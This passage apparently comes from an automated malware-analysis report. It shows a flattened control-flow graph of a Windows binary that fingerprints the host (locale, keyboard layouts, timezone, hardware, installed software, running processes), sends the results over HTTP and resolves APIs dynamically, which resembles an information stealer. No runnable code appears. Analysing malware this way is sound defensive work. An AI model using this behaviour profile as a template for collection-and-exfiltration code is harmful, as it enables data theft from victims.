lstrcpy 14795->14796 14797 e25b2a 14796->14797 14798 e3a9b0 4 API calls 14797->14798 14799 e25b56 14798->14799 14800 e3a920 3 API calls 14799->14800 14801 e25b5d 14800->14801 14802 e3a8a0 lstrcpy 14801->14802 14803 e25b66 14802->14803 14804 e25b7c InternetConnectA 14803->14804 14804->14760 14805 e25bac HttpOpenRequestA 14804->14805 14807 e25fb6 InternetCloseHandle 14805->14807 14808 e25c0b 14805->14808 14807->14760 14809 e3a9b0 4 API calls 14808->14809 14810 e25c1f 14809->14810 14811 e3a8a0 lstrcpy 14810->14811 14812 e25c28 14811->14812 14813 e3a920 3 API calls 14812->14813 14814 e25c46 14813->14814 14815 e3a8a0 lstrcpy 14814->14815 14816 e25c4f 14815->14816 14817 e3a9b0 4 API calls 14816->14817 14818 e25c6e 14817->14818 14819 e3a8a0 lstrcpy 14818->14819 14820 e25c77 14819->14820 14821 
e3a9b0 4 API calls 14820->14821 14822 e25c98 14821->14822 14823 e3a8a0 lstrcpy 14822->14823 14824 e25ca1 14823->14824 14825 e3a9b0 4 API calls 14824->14825 14826 e25cc1 14825->14826 14827 e3a8a0 lstrcpy 14826->14827 14828 e25cca 14827->14828 14829 e3a9b0 4 API calls 14828->14829 14830 e25ce9 14829->14830 14831 e3a8a0 lstrcpy 14830->14831 14832 e25cf2 14831->14832 14833 e3a920 3 API calls 14832->14833 14834 e25d10 14833->14834 14835 e3a8a0 lstrcpy 14834->14835 14836 e25d19 14835->14836 14837 e3a9b0 4 API calls 14836->14837 14838 e25d38 14837->14838 14839 e3a8a0 lstrcpy 14838->14839 14840 e25d41 14839->14840 14841 e3a9b0 4 API calls 14840->14841 14842 e25d60 14841->14842 14843 e3a8a0 lstrcpy 14842->14843 14844 e25d69 14843->14844 14845 e3a920 3 API calls 14844->14845 14846 e25d87 14845->14846 14847 e3a8a0 lstrcpy 14846->14847 14848 e25d90 14847->14848 14849 e3a9b0 4 API calls 14848->14849 14850 e25daf 14849->14850 14851 e3a8a0 lstrcpy 14850->14851 14852 e25db8 14851->14852 14853 e3a9b0 4 API calls 14852->14853 14854 e25dd9 14853->14854 14855 e3a8a0 lstrcpy 14854->14855 14856 e25de2 14855->14856 14857 e3a9b0 4 API calls 14856->14857 14858 e25e02 14857->14858 14859 e3a8a0 lstrcpy 14858->14859 14860 e25e0b 14859->14860 14861 e3a9b0 4 API calls 14860->14861 14862 e25e2a 14861->14862 14863 e3a8a0 lstrcpy 14862->14863 14864 e25e33 14863->14864 14865 e3a920 3 API calls 14864->14865 14866 e25e54 14865->14866 14867 e3a8a0 lstrcpy 14866->14867 14868 e25e5d 14867->14868 14869 e25e70 lstrlen 14868->14869 15665 e3aad0 14869->15665 14871 e25e81 lstrlen GetProcessHeap RtlAllocateHeap 15666 e3aad0 14871->15666 14873 e25eae lstrlen 14874 e25ebe 14873->14874 14875 e25ed7 lstrlen 14874->14875 14876 e25ee7 14875->14876 14877 e25ef0 lstrlen 14876->14877 14878 e25f04 14877->14878 14879 e25f1a lstrlen 14878->14879 15667 e3aad0 14879->15667 14881 e25f2a HttpSendRequestA 14882 e25f35 InternetReadFile 14881->14882 14883 e25f6a InternetCloseHandle 14882->14883 14887 e25f61 14882->14887 
14883->14807 14885 e3a9b0 4 API calls 14885->14887 14886 e3a8a0 lstrcpy 14886->14887 14887->14882 14887->14883 14887->14885 14887->14886 14889 e31077 14888->14889 14890 e31151 14889->14890 14891 e3a820 lstrlen lstrcpy 14889->14891 14890->13659 14891->14889 14894 e30db7 14892->14894 14893 e30f17 14893->13667 14894->14893 14895 e30e27 StrCmpCA 14894->14895 14896 e30e67 StrCmpCA 14894->14896 14897 e30ea4 StrCmpCA 14894->14897 14898 e3a820 lstrlen lstrcpy 14894->14898 14895->14894 14896->14894 14897->14894 14898->14894 14902 e30f67 14899->14902 14900 e31044 14900->13675 14901 e30fb2 StrCmpCA 14901->14902 14902->14900 14902->14901 14903 e3a820 lstrlen lstrcpy 14902->14903 14903->14902 14905 e3a740 lstrcpy 14904->14905 14906 e31a26 14905->14906 14907 e3a9b0 4 API calls 14906->14907 14908 e31a37 14907->14908 14909 e3a8a0 lstrcpy 14908->14909 14910 e31a40 14909->14910 14911 e3a9b0 4 API calls 14910->14911 14912 e31a5b 14911->14912 14913 e3a8a0 lstrcpy 14912->14913 14914 e31a64 14913->14914 14915 e3a9b0 4 API calls 14914->14915 14916 e31a7d 14915->14916 14917 e3a8a0 lstrcpy 14916->14917 14918 e31a86 14917->14918 14919 e3a9b0 4 API calls 14918->14919 14920 e31aa1 14919->14920 14921 e3a8a0 lstrcpy 14920->14921 14922 e31aaa 14921->14922 14923 e3a9b0 4 API calls 14922->14923 14924 e31ac3 14923->14924 14925 e3a8a0 lstrcpy 14924->14925 14926 e31acc 14925->14926 14927 e3a9b0 4 API calls 14926->14927 14928 e31ae7 14927->14928 14929 e3a8a0 lstrcpy 14928->14929 14930 e31af0 14929->14930 14931 e3a9b0 4 API calls 14930->14931 14932 e31b09 14931->14932 14933 e3a8a0 lstrcpy 14932->14933 14934 e31b12 14933->14934 14935 e3a9b0 4 API calls 14934->14935 14936 e31b2d 14935->14936 14937 e3a8a0 lstrcpy 14936->14937 14938 e31b36 14937->14938 14939 e3a9b0 4 API calls 14938->14939 14940 e31b4f 14939->14940 14941 e3a8a0 lstrcpy 14940->14941 14942 e31b58 14941->14942 14943 e3a9b0 4 API calls 14942->14943 14944 e31b76 14943->14944 14945 e3a8a0 lstrcpy 14944->14945 14946 e31b7f 14945->14946 14947 
e37500 6 API calls 14946->14947 14948 e31b96 14947->14948 14949 e3a920 3 API calls 14948->14949 14950 e31ba9 14949->14950 14951 e3a8a0 lstrcpy 14950->14951 14952 e31bb2 14951->14952 14953 e3a9b0 4 API calls 14952->14953 14954 e31bdc 14953->14954 14955 e3a8a0 lstrcpy 14954->14955 14956 e31be5 14955->14956 14957 e3a9b0 4 API calls 14956->14957 14958 e31c05 14957->14958 14959 e3a8a0 lstrcpy 14958->14959 14960 e31c0e 14959->14960 15668 e37690 GetProcessHeap RtlAllocateHeap 14960->15668 14963 e3a9b0 4 API calls 14964 e31c2e 14963->14964 14965 e3a8a0 lstrcpy 14964->14965 14966 e31c37 14965->14966 14967 e3a9b0 4 API calls 14966->14967 14968 e31c56 14967->14968 14969 e3a8a0 lstrcpy 14968->14969 14970 e31c5f 14969->14970 14971 e3a9b0 4 API calls 14970->14971 14972 e31c80 14971->14972 14973 e3a8a0 lstrcpy 14972->14973 14974 e31c89 14973->14974 15675 e377c0 GetCurrentProcess IsWow64Process 14974->15675 14977 e3a9b0 4 API calls 14978 e31ca9 14977->14978 14979 e3a8a0 lstrcpy 14978->14979 14980 e31cb2 14979->14980 14981 e3a9b0 4 API calls 14980->14981 14982 e31cd1 14981->14982 14983 e3a8a0 lstrcpy 14982->14983 14984 e31cda 14983->14984 14985 e3a9b0 4 API calls 14984->14985 14986 e31cfb 14985->14986 14987 e3a8a0 lstrcpy 14986->14987 14988 e31d04 14987->14988 14989 e37850 3 API calls 14988->14989 14990 e31d14 14989->14990 14991 e3a9b0 4 API calls 14990->14991 14992 e31d24 14991->14992 14993 e3a8a0 lstrcpy 14992->14993 14994 e31d2d 14993->14994 14995 e3a9b0 4 API calls 14994->14995 14996 e31d4c 14995->14996 14997 e3a8a0 lstrcpy 14996->14997 14998 e31d55 14997->14998 14999 e3a9b0 4 API calls 14998->14999 15000 e31d75 14999->15000 15001 e3a8a0 lstrcpy 15000->15001 15002 e31d7e 15001->15002 15003 e378e0 3 API calls 15002->15003 15004 e31d8e 15003->15004 15005 e3a9b0 4 API calls 15004->15005 15006 e31d9e 15005->15006 15007 e3a8a0 lstrcpy 15006->15007 15008 e31da7 15007->15008 15009 e3a9b0 4 API calls 15008->15009 15010 e31dc6 15009->15010 15011 e3a8a0 lstrcpy 15010->15011 15012 e31dcf 
15011->15012 15013 e3a9b0 4 API calls 15012->15013 15014 e31df0 15013->15014 15015 e3a8a0 lstrcpy 15014->15015 15016 e31df9 15015->15016 15677 e37980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15016->15677 15019 e3a9b0 4 API calls 15020 e31e19 15019->15020 15021 e3a8a0 lstrcpy 15020->15021 15022 e31e22 15021->15022 15023 e3a9b0 4 API calls 15022->15023 15024 e31e41 15023->15024 15025 e3a8a0 lstrcpy 15024->15025 15026 e31e4a 15025->15026 15027 e3a9b0 4 API calls 15026->15027 15028 e31e6b 15027->15028 15029 e3a8a0 lstrcpy 15028->15029 15030 e31e74 15029->15030 15679 e37a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15030->15679 15033 e3a9b0 4 API calls 15034 e31e94 15033->15034 15035 e3a8a0 lstrcpy 15034->15035 15036 e31e9d 15035->15036 15037 e3a9b0 4 API calls 15036->15037 15038 e31ebc 15037->15038 15039 e3a8a0 lstrcpy 15038->15039 15040 e31ec5 15039->15040 15041 e3a9b0 4 API calls 15040->15041 15042 e31ee5 15041->15042 15043 e3a8a0 lstrcpy 15042->15043 15044 e31eee 15043->15044 15682 e37b00 GetUserDefaultLocaleName 15044->15682 15047 e3a9b0 4 API calls 15048 e31f0e 15047->15048 15049 e3a8a0 lstrcpy 15048->15049 15050 e31f17 15049->15050 15051 e3a9b0 4 API calls 15050->15051 15052 e31f36 15051->15052 15053 e3a8a0 lstrcpy 15052->15053 15054 e31f3f 15053->15054 15055 e3a9b0 4 API calls 15054->15055 15056 e31f60 15055->15056 15057 e3a8a0 lstrcpy 15056->15057 15058 e31f69 15057->15058 15686 e37b90 15058->15686 15060 e31f80 15061 e3a920 3 API calls 15060->15061 15062 e31f93 15061->15062 15063 e3a8a0 lstrcpy 15062->15063 15064 e31f9c 15063->15064 15065 e3a9b0 4 API calls 15064->15065 15066 e31fc6 15065->15066 15067 e3a8a0 lstrcpy 15066->15067 15068 e31fcf 15067->15068 15069 e3a9b0 4 API calls 15068->15069 15070 e31fef 15069->15070 15071 e3a8a0 lstrcpy 15070->15071 15072 e31ff8 15071->15072 15698 e37d80 GetSystemPowerStatus 15072->15698 15075 e3a9b0 4 API calls 15076 e32018 15075->15076 15077 e3a8a0 lstrcpy 15076->15077 15078 e32021 15077->15078 15079 
e3a9b0 4 API calls 15078->15079 15080 e32040 15079->15080 15081 e3a8a0 lstrcpy 15080->15081 15082 e32049 15081->15082 15083 e3a9b0 4 API calls 15082->15083 15084 e3206a 15083->15084 15085 e3a8a0 lstrcpy 15084->15085 15086 e32073 15085->15086 15087 e3207e GetCurrentProcessId 15086->15087 15700 e39470 OpenProcess 15087->15700 15090 e3a920 3 API calls 15091 e320a4 15090->15091 15092 e3a8a0 lstrcpy 15091->15092 15093 e320ad 15092->15093 15094 e3a9b0 4 API calls 15093->15094 15095 e320d7 15094->15095 15096 e3a8a0 lstrcpy 15095->15096 15097 e320e0 15096->15097 15098 e3a9b0 4 API calls 15097->15098 15099 e32100 15098->15099 15100 e3a8a0 lstrcpy 15099->15100 15101 e32109 15100->15101 15705 e37e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15101->15705 15104 e3a9b0 4 API calls 15105 e32129 15104->15105 15106 e3a8a0 lstrcpy 15105->15106 15107 e32132 15106->15107 15108 e3a9b0 4 API calls 15107->15108 15109 e32151 15108->15109 15110 e3a8a0 lstrcpy 15109->15110 15111 e3215a 15110->15111 15112 e3a9b0 4 API calls 15111->15112 15113 e3217b 15112->15113 15114 e3a8a0 lstrcpy 15113->15114 15115 e32184 15114->15115 15709 e37f60 15115->15709 15118 e3a9b0 4 API calls 15119 e321a4 15118->15119 15120 e3a8a0 lstrcpy 15119->15120 15121 e321ad 15120->15121 15122 e3a9b0 4 API calls 15121->15122 15123 e321cc 15122->15123 15124 e3a8a0 lstrcpy 15123->15124 15125 e321d5 15124->15125 15126 e3a9b0 4 API calls 15125->15126 15127 e321f6 15126->15127 15128 e3a8a0 lstrcpy 15127->15128 15129 e321ff 15128->15129 15722 e37ed0 GetSystemInfo wsprintfA 15129->15722 15132 e3a9b0 4 API calls 15133 e3221f 15132->15133 15134 e3a8a0 lstrcpy 15133->15134 15135 e32228 15134->15135 15136 e3a9b0 4 API calls 15135->15136 15137 e32247 15136->15137 15138 e3a8a0 lstrcpy 15137->15138 15139 e32250 15138->15139 15140 e3a9b0 4 API calls 15139->15140 15141 e32270 15140->15141 15142 e3a8a0 lstrcpy 15141->15142 15143 e32279 15142->15143 15724 e38100 GetProcessHeap RtlAllocateHeap 15143->15724 15146 e3a9b0 4 API calls 15147 
e32299 15146->15147 15148 e3a8a0 lstrcpy 15147->15148 15149 e322a2 15148->15149 15150 e3a9b0 4 API calls 15149->15150 15151 e322c1 15150->15151 15152 e3a8a0 lstrcpy 15151->15152 15153 e322ca 15152->15153 15154 e3a9b0 4 API calls 15153->15154 15155 e322eb 15154->15155 15156 e3a8a0 lstrcpy 15155->15156 15157 e322f4 15156->15157 15730 e387c0 15157->15730 15160 e3a920 3 API calls 15161 e3231e 15160->15161 15162 e3a8a0 lstrcpy 15161->15162 15163 e32327 15162->15163 15164 e3a9b0 4 API calls 15163->15164 15165 e32351 15164->15165 15166 e3a8a0 lstrcpy 15165->15166 15167 e3235a 15166->15167 15168 e3a9b0 4 API calls 15167->15168 15169 e3237a 15168->15169 15170 e3a8a0 lstrcpy 15169->15170 15171 e32383 15170->15171 15172 e3a9b0 4 API calls 15171->15172 15173 e323a2 15172->15173 15174 e3a8a0 lstrcpy 15173->15174 15175 e323ab 15174->15175 15735 e381f0 15175->15735 15177 e323c2 15178 e3a920 3 API calls 15177->15178 15179 e323d5 15178->15179 15180 e3a8a0 lstrcpy 15179->15180 15181 e323de 15180->15181 15182 e3a9b0 4 API calls 15181->15182 15183 e3240a 15182->15183 15184 e3a8a0 lstrcpy 15183->15184 15185 e32413 15184->15185 15186 e3a9b0 4 API calls 15185->15186 15187 e32432 15186->15187 15188 e3a8a0 lstrcpy 15187->15188 15189 e3243b 15188->15189 15190 e3a9b0 4 API calls 15189->15190 15191 e3245c 15190->15191 15192 e3a8a0 lstrcpy 15191->15192 15193 e32465 15192->15193 15194 e3a9b0 4 API calls 15193->15194 15195 e32484 15194->15195 15196 e3a8a0 lstrcpy 15195->15196 15197 e3248d 15196->15197 15198 e3a9b0 4 API calls 15197->15198 15199 e324ae 15198->15199 15200 e3a8a0 lstrcpy 15199->15200 15201 e324b7 15200->15201 15743 e38320 15201->15743 15203 e324d3 15204 e3a920 3 API calls 15203->15204 15205 e324e6 15204->15205 15206 e3a8a0 lstrcpy 15205->15206 15207 e324ef 15206->15207 15208 e3a9b0 4 API calls 15207->15208 15209 e32519 15208->15209 15210 e3a8a0 lstrcpy 15209->15210 15211 e32522 15210->15211 15212 e3a9b0 4 API calls 15211->15212 15213 e32543 15212->15213 15214 e3a8a0 lstrcpy 
15213->15214 15215 e3254c 15214->15215 15216 e38320 17 API calls 15215->15216 15217 e32568 15216->15217 15218 e3a920 3 API calls 15217->15218 15219 e3257b 15218->15219 15220 e3a8a0 lstrcpy 15219->15220 15221 e32584 15220->15221 15222 e3a9b0 4 API calls 15221->15222 15223 e325ae 15222->15223 15224 e3a8a0 lstrcpy 15223->15224 15225 e325b7 15224->15225 15226 e3a9b0 4 API calls 15225->15226 15227 e325d6 15226->15227 15228 e3a8a0 lstrcpy 15227->15228 15229 e325df 15228->15229 15230 e3a9b0 4 API calls 15229->15230 15231 e32600 15230->15231 15232 e3a8a0 lstrcpy 15231->15232 15233 e32609 15232->15233 15779 e38680 15233->15779 15235 e32620 15236 e3a920 3 API calls 15235->15236 15237 e32633 15236->15237 15238 e3a8a0 lstrcpy 15237->15238 15239 e3263c 15238->15239 15240 e3265a lstrlen 15239->15240 15241 e3266a 15240->15241 15242 e3a740 lstrcpy 15241->15242 15243 e3267c 15242->15243 15244 e21590 lstrcpy 15243->15244 15245 e3268d 15244->15245 15789 e35190 15245->15789 15247 e32699 15247->13679 15977 e3aad0 15248->15977 15250 e25009 InternetOpenUrlA 15254 e25021 15250->15254 15251 e250a0 InternetCloseHandle InternetCloseHandle 15253 e250ec 15251->15253 15252 e2502a InternetReadFile 15252->15254 15253->13683 15254->15251 15254->15252 15978 e298d0 15255->15978 15257 e30759 15258 e30a38 15257->15258 15259 e3077d 15257->15259 15260 e21590 lstrcpy 15258->15260 15262 e30799 StrCmpCA 15259->15262 15261 e30a49 15260->15261 16154 e30250 15261->16154 15264 e30843 15262->15264 15265 e307a8 15262->15265 15268 e30865 StrCmpCA 15264->15268 15267 e3a7a0 lstrcpy 15265->15267 15269 e307c3 15267->15269 15270 e30874 15268->15270 15307 e3096b 15268->15307 15271 e21590 lstrcpy 15269->15271 15272 e3a740 lstrcpy 15270->15272 15273 e3080c 15271->15273 15276 e30881 15272->15276 15274 e3a7a0 lstrcpy 15273->15274 15277 e30823 15274->15277 15275 e3099c StrCmpCA 15278 e30a2d 15275->15278 15279 e309ab 15275->15279 15280 e3a9b0 4 API calls 15276->15280 15281 e3a7a0 lstrcpy 15277->15281 15278->13687 15282 
e21590 lstrcpy 15279->15282 15283 e308ac 15280->15283 15284 e3083e 15281->15284 15285 e309f4 15282->15285 15286 e3a920 3 API calls 15283->15286 15981 e2fb00 15284->15981 15288 e3a7a0 lstrcpy 15285->15288 15289 e308b3 15286->15289 15291 e30a0d 15288->15291 15290 e3a9b0 4 API calls 15289->15290 15292 e308ba 15290->15292 15293 e3a7a0 lstrcpy 15291->15293 15295 e3a8a0 lstrcpy 15292->15295 15294 e30a28 15293->15294 15307->15275 15629 e3a7a0 lstrcpy 15628->15629 15630 e21683 15629->15630 15631 e3a7a0 lstrcpy 15630->15631 15632 e21695 15631->15632 15633 e3a7a0 lstrcpy 15632->15633 15634 e216a7 15633->15634 15635 e3a7a0 lstrcpy 15634->15635 15636 e215a3 15635->15636 15636->14510 15638 e247c6 15637->15638 15639 e24838 lstrlen 15638->15639 15663 e3aad0 15639->15663 15641 e24848 InternetCrackUrlA 15642 e24867 15641->15642 15642->14587 15644 e3a740 lstrcpy 15643->15644 15645 e38b74 15644->15645 15646 e3a740 lstrcpy 15645->15646 15647 e38b82 GetSystemTime 15646->15647 15649 e38b99 15647->15649 15648 e3a7a0 lstrcpy 15650 e38bfc 15648->15650 15649->15648 15650->14602 15653 e3a931 15651->15653 15652 e3a988 15654 e3a7a0 lstrcpy 15652->15654 15653->15652 15655 e3a968 lstrcpy lstrcat 15653->15655 15656 e3a994 15654->15656 15655->15652 15656->14606 15657->14720 15659 e24eee 15658->15659 15660 e29af9 LocalAlloc 15658->15660 15659->14608 15659->14611 15660->15659 15661 e29b14 CryptStringToBinaryA 15660->15661 15661->15659 15662 e29b39 LocalFree 15661->15662 15662->15659 15663->15641 15664->14730 15665->14871 15666->14873 15667->14881 15796 e377a0 15668->15796 15671 e376c6 RegOpenKeyExA 15673 e376e7 RegQueryValueExA 15671->15673 15674 e37704 RegCloseKey 15671->15674 15672 e31c1e 15672->14963 15673->15674 15674->15672 15676 e31c99 15675->15676 15676->14977 15678 e31e09 15677->15678 15678->15019 15680 e31e84 15679->15680 15681 e37a9a wsprintfA 15679->15681 15680->15033 15681->15680 15683 e37b4d 15682->15683 15685 e31efe 15682->15685 15803 e38d20 LocalAlloc CharToOemW 15683->15803 
15685->15047 15687 e3a740 lstrcpy 15686->15687 15688 e37bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15687->15688 15689 e37c25 15688->15689 15690 e37c46 GetLocaleInfoA 15689->15690 15691 e37d18 15689->15691 15695 e3a8a0 lstrcpy 15689->15695 15696 e3a9b0 lstrcpy lstrlen lstrcpy lstrcat 15689->15696 15690->15689 15692 e37d28 15691->15692 15693 e37d1e LocalFree 15691->15693 15694 e3a7a0 lstrcpy 15692->15694 15693->15692 15697 e37d37 15694->15697 15695->15689 15696->15689 15697->15060 15699 e32008 15698->15699 15699->15075 15701 e39493 GetModuleFileNameExA CloseHandle 15700->15701 15702 e394b5 15700->15702 15701->15702 15703 e3a740 lstrcpy 15702->15703 15704 e32091 15703->15704 15704->15090 15706 e32119 15705->15706 15707 e37e68 RegQueryValueExA 15705->15707 15706->15104 15708 e37e8e RegCloseKey 15707->15708 15708->15706 15710 e37fb9 GetLogicalProcessorInformationEx 15709->15710 15711 e38029 15710->15711 15712 e37fd8 GetLastError 15710->15712 15717 e389f0 2 API calls 15711->15717 15718 e37fe3 15712->15718 15720 e38022 15712->15720 15715 e389f0 2 API calls 15716 e32194 15715->15716 15716->15118 15719 e3807b 15717->15719 15718->15710 15718->15716 15804 e389f0 15718->15804 15807 e38a10 GetProcessHeap RtlAllocateHeap 15718->15807 15719->15720 15721 e38084 wsprintfA 15719->15721 15720->15715 15720->15716 15721->15716 15723 e3220f 15722->15723 15723->15132 15725 e389b0 15724->15725 15726 e3814d GlobalMemoryStatusEx 15725->15726 15729 e38163 __aulldiv 15726->15729 15727 e3819b wsprintfA 15728 e32289 15727->15728 15728->15146 15729->15727 15731 e387fb GetProcessHeap RtlAllocateHeap wsprintfA 15730->15731 15733 e3a740 lstrcpy 15731->15733 15734 e3230b 15733->15734 15734->15160 15736 e3a740 lstrcpy 15735->15736 15742 e38229 15736->15742 15737 e38263 15738 e3a7a0 lstrcpy 15737->15738 15740 e382dc 15738->15740 15739 e3a9b0 lstrcpy lstrlen lstrcpy lstrcat 15739->15742 15740->15177 15741 e3a8a0 lstrcpy 15741->15742 15742->15737 15742->15739 15742->15741 15744 e3a740 
lstrcpy 15743->15744 15745 e3835c RegOpenKeyExA 15744->15745 15746 e383d0 15745->15746 15747 e383ae 15745->15747 15749 e38613 RegCloseKey 15746->15749 15750 e383f8 RegEnumKeyExA 15746->15750 15748 e3a7a0 lstrcpy 15747->15748 15756 e383bd 15748->15756 15753 e3a7a0 lstrcpy 15749->15753 15751 e3843f wsprintfA RegOpenKeyExA 15750->15751 15752 e3860e 15750->15752 15754 e384c1 RegQueryValueExA 15751->15754 15755 e38485 RegCloseKey RegCloseKey 15751->15755 15752->15749 15753->15756 15758 e38601 RegCloseKey 15754->15758 15759 e384fa lstrlen 15754->15759 15757 e3a7a0 lstrcpy 15755->15757 15756->15203 15757->15756 15758->15752 15759->15758 15760 e38510 15759->15760 15761 e3a9b0 4 API calls 15760->15761 15762 e38527 15761->15762 15763 e3a8a0 lstrcpy 15762->15763 15764 e38533 15763->15764 15765 e3a9b0 4 API calls 15764->15765 15766 e38557 15765->15766 15767 e3a8a0 lstrcpy 15766->15767 15768 e38563 15767->15768 15769 e3856e RegQueryValueExA 15768->15769 15769->15758 15770 e385a3 15769->15770 15771 e3a9b0 4 API calls 15770->15771 15772 e385ba 15771->15772 15773 e3a8a0 lstrcpy 15772->15773 15774 e385c6 15773->15774 15775 e3a9b0 4 API calls 15774->15775 15776 e385ea 15775->15776 15777 e3a8a0 lstrcpy 15776->15777 15778 e385f6 15777->15778 15778->15758 15780 e3a740 lstrcpy 15779->15780 15781 e386bc CreateToolhelp32Snapshot Process32First 15780->15781 15782 e386e8 Process32Next 15781->15782 15783 e3875d CloseHandle 15781->15783 15782->15783 15786 e386fd 15782->15786 15784 e3a7a0 lstrcpy 15783->15784 15785 e38776 15784->15785 15785->15235 15786->15782 15787 e3a9b0 lstrcpy lstrlen lstrcpy lstrcat 15786->15787 15788 e3a8a0 lstrcpy 15786->15788 15787->15786 15788->15786 15790 e3a7a0 lstrcpy 15789->15790 15791 e351b5 15790->15791 15792 e21590 lstrcpy 15791->15792 15793 e351c6 15792->15793 15808 e25100 15793->15808 15795 e351cf 15795->15247 15799 e37720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15796->15799 15798 e376b9 15798->15671 15798->15672 15800 e37780 RegCloseKey 15799->15800 
15801 e37765 RegQueryValueExA 15799->15801 15802 e37793 15800->15802 15801->15800 15802->15798 15803->15685 15805 e389f9 GetProcessHeap HeapFree 15804->15805 15806 e38a0c 15804->15806 15805->15806 15806->15718 15807->15718 15809 e3a7a0 lstrcpy 15808->15809 15810 e25119 15809->15810 15811 e247b0 2 API calls 15810->15811 15812 e25125 15811->15812 15968 e38ea0 15812->15968 15814 e25184 15815 e25192 lstrlen 15814->15815 15816 e251a5 15815->15816 15817 e38ea0 4 API calls 15816->15817 15818 e251b6 15817->15818 15819 e3a740 lstrcpy 15818->15819 15820 e251c9 15819->15820 15821 e3a740 lstrcpy 15820->15821 15822 e251d6 15821->15822 15823 e3a740 lstrcpy 15822->15823 15824 e251e3 15823->15824 15825 e3a740 lstrcpy 15824->15825 15826 e251f0 15825->15826 15827 e3a740 lstrcpy 15826->15827 15828 e251fd InternetOpenA StrCmpCA 15827->15828 15829 e2522f 15828->15829 15830 e258c4 InternetCloseHandle 15829->15830 15831 e38b60 3 API calls 15829->15831 15837 e258d9 ctype 15830->15837 15832 e2524e 15831->15832 15833 e3a920 3 API calls 15832->15833 15834 e25261 15833->15834 15835 e3a8a0 lstrcpy 15834->15835 15836 e2526a 15835->15836 15838 e3a9b0 4 API calls 15836->15838 15841 e3a7a0 lstrcpy 15837->15841 15839 e252ab 15838->15839 15840 e3a920 3 API calls 15839->15840 15842 e252b2 15840->15842 15848 e25913 15841->15848 15843 e3a9b0 4 API calls 15842->15843 15844 e252b9 15843->15844 15845 e3a8a0 lstrcpy 15844->15845 15846 e252c2 15845->15846 15847 e3a9b0 4 API calls 15846->15847 15849 e25303 15847->15849 15848->15795 15850 e3a920 3 API calls 15849->15850 15851 e2530a 15850->15851 15852 e3a8a0 lstrcpy 15851->15852 15853 e25313 15852->15853 15854 e25329 InternetConnectA 15853->15854 15854->15830 15855 e25359 HttpOpenRequestA 15854->15855 15857 e258b7 InternetCloseHandle 15855->15857 15858 e253b7 15855->15858 15857->15830 15859 e3a9b0 4 API calls 15858->15859 15860 e253cb 15859->15860 15861 e3a8a0 lstrcpy 15860->15861 15862 e253d4 15861->15862 15863 e3a920 3 API calls 15862->15863 15864 e253f2 
15863->15864 15865 e3a8a0 lstrcpy 15864->15865 15866 e253fb 15865->15866 15867 e3a9b0 4 API calls 15866->15867 15868 e2541a 15867->15868 15869 e3a8a0 lstrcpy 15868->15869 15870 e25423 15869->15870 15871 e3a9b0 4 API calls 15870->15871 15872 e25444 15871->15872 15873 e3a8a0 lstrcpy 15872->15873 15874 e2544d 15873->15874 15875 e3a9b0 4 API calls 15874->15875 15876 e2546e 15875->15876 15877 e3a8a0 lstrcpy 15876->15877 15969 e38ea9 15968->15969 15970 e38ead CryptBinaryToStringA 15968->15970 15969->15814 15970->15969 15971 e38ece GetProcessHeap RtlAllocateHeap 15970->15971 15971->15969 15972 e38ef4 ctype 15971->15972 15973 e38f05 CryptBinaryToStringA 15972->15973 15973->15969 15977->15250 16220 e29880 15978->16220 15980 e298e1 15980->15257 15982 e3a740 lstrcpy 15981->15982 16155 e3a740 lstrcpy 16154->16155 16156 e30266 16155->16156 16157 e38de0 2 API calls 16156->16157 16158 e3027b 16157->16158 16159 e3a920 3 API calls 16158->16159 16160 e3028b 16159->16160 16161 e3a8a0 lstrcpy 16160->16161 16162 e30294 16161->16162 16163 e3a9b0 4 API calls 16162->16163 16164 e302b8 16163->16164 16221 e2988e 16220->16221 16224 e26fb0 16221->16224 16223 e298ad ctype 16223->15980 16227 e26d40 16224->16227 16228 e26d63 16227->16228 16242 e26d59 16227->16242 16243 e26530 16228->16243 16232 e26dbe 16232->16242 16253 e269b0 16232->16253 16234 e26e2a 16235 e26ee6 VirtualFree 16234->16235 16237 e26ef7 16234->16237 16234->16242 16235->16237 16236 e26f41 16240 e389f0 2 API calls 16236->16240 16236->16242 16237->16236 16238 e26f26 FreeLibrary 16237->16238 16239 e26f38 16237->16239 16238->16237 16241 e389f0 2 API calls 16239->16241 16240->16242 16241->16236 16242->16223 16244 e26542 16243->16244 16246 e26549 16244->16246 16263 e38a10 GetProcessHeap RtlAllocateHeap 16244->16263 16246->16242 16247 e26660 16246->16247 16250 e2668f VirtualAlloc 16247->16250 16249 e26730 16251 e26743 VirtualAlloc 16249->16251 16252 e2673c 16249->16252 16250->16249 16250->16252 16251->16252 16252->16232 16254 e269c9 
16253->16254 16255 e269d5 16253->16255 16254->16255 16256 e26a09 LoadLibraryA 16254->16256 16255->16234 16256->16255 16257 e26a32 16256->16257 16260 e26ae0 16257->16260 16264 e38a10 GetProcessHeap RtlAllocateHeap 16257->16264 16259 e26ba8 GetProcAddress 16259->16255 16259->16260 16260->16255 16260->16259 16261 e389f0 2 API calls 16261->16260 16262 e26a8b 16262->16255 16262->16261 16263->16246 16264->16262

                        Control-flow Graph

                        APIs
                        • GetProcAddress.KERNEL32(76210000,01961748), ref: 00E398A1
                        • GetProcAddress.KERNEL32(76210000,01961568), ref: 00E398BA
                        • GetProcAddress.KERNEL32(76210000,019615C8), ref: 00E398D2
                        • GetProcAddress.KERNEL32(76210000,019615E0), ref: 00E398EA
                        • GetProcAddress.KERNEL32(76210000,01961538), ref: 00E39903
                        • GetProcAddress.KERNEL32(76210000,019689F0), ref: 00E3991B
                        • GetProcAddress.KERNEL32(76210000,01956718), ref: 00E39933
                        • GetProcAddress.KERNEL32(76210000,01956498), ref: 00E3994C
                        • GetProcAddress.KERNEL32(76210000,019615F8), ref: 00E39964
                        • GetProcAddress.KERNEL32(76210000,019616D0), ref: 00E3997C
                        • GetProcAddress.KERNEL32(76210000,019615B0), ref: 00E39995
                        • GetProcAddress.KERNEL32(76210000,01961760), ref: 00E399AD
                        • GetProcAddress.KERNEL32(76210000,01956678), ref: 00E399C5
                        • GetProcAddress.KERNEL32(76210000,019617A8), ref: 00E399DE
                        • GetProcAddress.KERNEL32(76210000,01961610), ref: 00E399F6
                        • GetProcAddress.KERNEL32(76210000,01956558), ref: 00E39A0E
